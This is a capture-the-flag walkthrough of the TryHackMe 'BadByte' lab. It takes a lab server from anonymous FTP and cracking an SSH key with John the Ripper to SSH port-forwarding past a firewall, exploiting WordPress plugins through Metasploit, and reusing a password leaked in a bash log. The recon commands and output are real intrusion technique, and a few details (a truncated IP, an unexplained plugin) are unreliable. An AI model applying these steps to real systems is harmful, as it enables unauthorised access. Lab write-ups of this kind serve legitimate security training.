TryHackMe BadByte – How I Used Port Forwarding to Hack Into An Internal Site’s Server

5/5 - (2 votes)

Port forwarding is a networking technique that allows a user to access services on a computer or network behind a firewall or router. It opens up specific ports on a computer or network to allow external devices to connect and access services and applications on the internal network.

TryHackMe BadByte - How I Used Port Forwarding to Hack Into An Internal Site's Server

Challenge Overview

  • Link: https://tryhackme.com/room/badbyte
  • Difficulty: Easy
  • Target: “user.txt”, “root.txt” on the targetIP
  • Highlight: Using port forwarding to make an internal website accessible  (i.e., hackable) outside the network.
  • Tags: FTP, port forwarding

RECON

Let’s start by noting down our IP addresses and exporting them as variables in the terminal.

export targetIP=10.10.241.193
export myIP=10.6.2.23

Next, let’s run a standard Nmap scan. The -vv flag indicates very verbose output.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -p- -vv 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:24 EST
Initiating Ping Scan at 14:24
Scanning 10.10.241.193 [2 ports]
Completed Ping Scan at 14:24, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:24
Completed Parallel DNS resolution of 1 host. at 14:24, 0.03s elapsed
Initiating Connect Scan at 14:24
Scanning 10.10.241.193 [65535 ports]
Discovered open port 22/tcp on 10.10.241.193
Increasing send delay for 10.10.241.193 from 0 to 5 due to 45 out of 149 dropped probes since last increase.
Discovered open port 30024/tcp on 10.10.241.193

Now we’ll run another more targeted Nmap scan to drill in on the open ports.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -A -p 22,30024 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:26 EST
Nmap scan report for 10.10.241.193
Host is up (0.086s latency).

PORT  	STATE SERVICE VERSION
22/tcp	open  ssh 	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_  256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open  ftp 	vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|  	Connected to ::ffff:10.6.2.23
|  	Logged in as ftp
|  	TYPE: ASCII
|  	No session bandwidth limit
|  	Session timeout in seconds is 300
|  	Control connection is plain text
|  	Data connections will be plain text
|  	At session startup, client count was 3
|  	vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--	1 ftp  	ftp      	1743 Mar 23  2021 id_rsa
|_-rw-r--r--	1 ftp  	ftp        	78 Mar 23  2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Let’s focus first on the FTP service running on port 30024. It allows anonymous FTP login, so we should be able to view and copy the two files found in the directory.

We can log into the FTP service with the command:

lftp -p 30024 10.10.241.19

In the 2021 note.txt we find a clue mentioning a possible username: errorcauser

CRACKING THE SSH PASSCODE WITH JOHN

Let’s first attempt to log in without knowing the password using the id_rsa file as an ssh private key:

ssh -i id_rsa errorcauser@10.10.241.193

We get the following error: Permissions 0644 for 'id_rsa' are too open

To use this key, we need to set more restrictive permissions on the file. We’ll use the following command:

sudo chmod 600 id_rsa

The other thing we need to do is use John the ripper to crack the passkey for the encrypted ssh key file.

First, we’ll set up the hash in a format acceptable to John the Ripper using ssh2john.py. My attack machine doesn’t have the program, so I grab it from this git repo and run it with the following command to save the hash in a new file.

python3 ssh2john.py id_rsa > hash

Next, we run John the Ripper on the hash with the simple command:

john hash

A few seconds later john finds a password match (errorcauser:cupcake). Now we have everything we need to ssh into the target machine.

SETTING UP PORT FORWARDING

In this box, the target machine has a firewall set up to block public access to the website hosted on port 80.

We can get around the firewall by setting up dynamic port forwarding. Let’s ssh into the target machine with the following command and our password (cupcake):

sudo ssh -i id_rsa -D 1337 errorcauser@10.10.241.193

(-D indicates dynamic port forwarding via an SSH tunnel on port 1337)

And we are in as user errorcauser!

Now we need to edit the proxychain file located at: /etc/proxychains.conf according to instructions in the TryHackMe instructions for this box to set up socks5 proxy on port 1337 for IP 127.0.0.1

Now let’s run an Nmap scan on the target machine via port forwarding with the command:

proxychains nmap -sT 127.0.0.1

(-sT for TCP connect scan)

Next, we need to set up local port forwarding with the command:

sudo ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.241.193

And now that everything is set up for port forwarding, we can check to see if our browser can open the website at http://127.0.0.1 

Bingo! Port forwarding is now running as intended!

ENUMERATING WORDPRESS

Walking the website reveals hints that it is a WordPress site. We can use a special Nmap script to specifically enumerate WordPress sites:

sudo nmap -sV --script http-wordpress-enum 127.0.0.1
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $sudo nmap -sV --script http-wordpress-enum 127.0.0.1
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 15:12 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000060s latency).
Not shown: 996 closed tcp ports (reset)
PORT 	STATE SERVICE	VERSION
21/tcp   open  ftp    	vsftpd 3.0.3
80/tcp   open  http   	Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 100 themes/plugins
|   plugins
|_	duplicator 1.3.26
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp  open  rpcbind	2-4 (RPC #100000)
| rpcinfo:
|   program version	port/proto  service
|   100000  2,3,4    	111/tcp   rpcbind
|   100000  2,3,4    	111/udp   rpcbind
|   100000  3,4      	111/tcp6  rpcbind
|_  100000  3,4      	111/udp6  rpcbind
5432/tcp open  postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
|   SMBProgNeg:
| 	SFATAL
| 	VFATAL
| 	C0A000
| 	Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| 	Fpostmaster.c
| 	L2127
|_	RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.92%I=7%D=12/30%Time=63AF464A%P=x86_64-pc-linux-gnu%r(S
SF:MBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronte
SF:nd\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x20
SF:3\.0\0Fpostmaster\.c\0L2127\0RProcessStartupPacket\0\0");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

Another option for WordPress enumeration is the classic command line tool: wpscan

┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $wpscan --url 127.0.0.1
_______________________________________________________________
     	__      	_______   _____
     	\ \    	/ /  __ \ / ____|
      	\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
       	\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        	\  /\  /  | | 	____) | (__| (_| | | | |
         	\/  \/   |_|	|_____/ \___|\__,_|_| |_|

     	WordPress Security Scanner by the WPScan Team
                     	Version 3.8.21
                          	 
   	@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://127.0.0.1/ [127.0.0.1]
[+] Started: Fri Dec 30 15:27:00 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1/, Match: 'WordPress 5.7'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <===============> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 15:27:10 2022
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 41.932 KB
[+] Data Received: 19.464 MB
[+] Memory used: 239.887 MB
[+] Elapsed time: 00:00:10

EXPLOITING WORDPRESS PLUGINS WITH METASPLOIT

Now it is time to fire up Metasploit and search for modules that target the two plugins found on the site: duplicator and file-manager.

The first module (scanner/http/wp_duplicator_file_read) can retrieve a list of users and services running on the machine. We’ll save this for later in case it comes in handy.

The second module (multi/http/wp_file_manager_rce) enables remote code execution. We will go forward with this attack vector to gain our initial foothold.

And we’ve now found our user.txt file in user cth’s home directory. Next, we will continue enumerating the machine for ways to escalate privileges.

PRIVILEGE ESCALATION

The bash.log file can be found and accessed by user cth at /var/log/bash.log

A misspelling of sudo by cth caused him to accidentally type his previous password in cleartext (G00dP@$sw0rd2020). Maybe the new one is G00dP@$sw0rd2021.

Let’s try it and, lo and behold, it works! I think it’s time for user cth to get a completely new password, not just keep changing the end to the current year’s date!

After ssh’ing in as cth, we can search for root.txt:

ssh in as cth@10.10.241.193

And the final step is to cat out the root.txt

sudo cat /root/root.txt

Where To Next?

Among other tools, we used a port scanner in this tutorial. Want to dive deeper into security research? Read on here:

👉 Recommended Tutorial: Creating a Port Scanner with Python Networking Sockets